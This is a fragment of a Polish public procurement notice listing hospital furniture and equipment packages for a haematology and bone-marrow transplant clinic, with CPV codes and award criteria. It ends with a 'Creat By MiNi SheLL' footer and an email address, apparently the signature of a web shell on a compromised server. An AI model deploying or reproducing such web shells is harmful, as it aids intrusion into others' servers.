128	poz. 103  ławka 					1	szt
129	Pomieszczenie nr 6 magazyn bielizny czystej						
130	poz. 104 drabina aluminiowa					1	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klinika Hematologii i Ośrodek Przeszczepu Szpiku						
2	Pomieszczenie 26- magazyn płynów infuzyjnych						
3	poz. 1 regał z blachy ocynkowanej					2	szt
4	poz. 2 regał z blachy ocynkowanej					1	szt
5	poz. 3 regał z blachy ocynkowanej					1	szt
6	poz. 4 regał z blachy ocynkowanej					1	szt
7	Pomieszczenie 33 i 34 magazyn sprzętu medycznego						
8	poz. 5 regał z blachy ocynkowanej					6	szt
9	poz. 6 regały z blachy ocynkowanej					4	szt
10	Pomieszczenie nr 25 śluza umywalkowo - fartuchowa						
11	poz. 7 regał z blachy ocynkowanej					1	szt
12	Pomieszczenie nr 35 pomieszczenie sprzętu porządkowego						
13	poz. 8 regał z blachy ocynkowanej					1	szt
14	poz. 9 regał z blachy ocynkowanej					1	szt
15	Pomieszczenie nr 21 brudownik						
16	poz. 10 regał z blachy ocynkowanej					1	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klinika Hematologii i Ośrodek Przeszczepu Szpiku						
2	Stelaże na worki 60 l.					20	szt
3	Stelaże na worki 120 l					2	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klinika Hematologii i Ośrodek Przeszczepu Szpiku						
2	Wózek do transportu chorego					1	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klinika Hematologii i Ośrodek Przeszczepu Szpiku						
2	Wózek opatrunkowo - zabiegowy					6	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com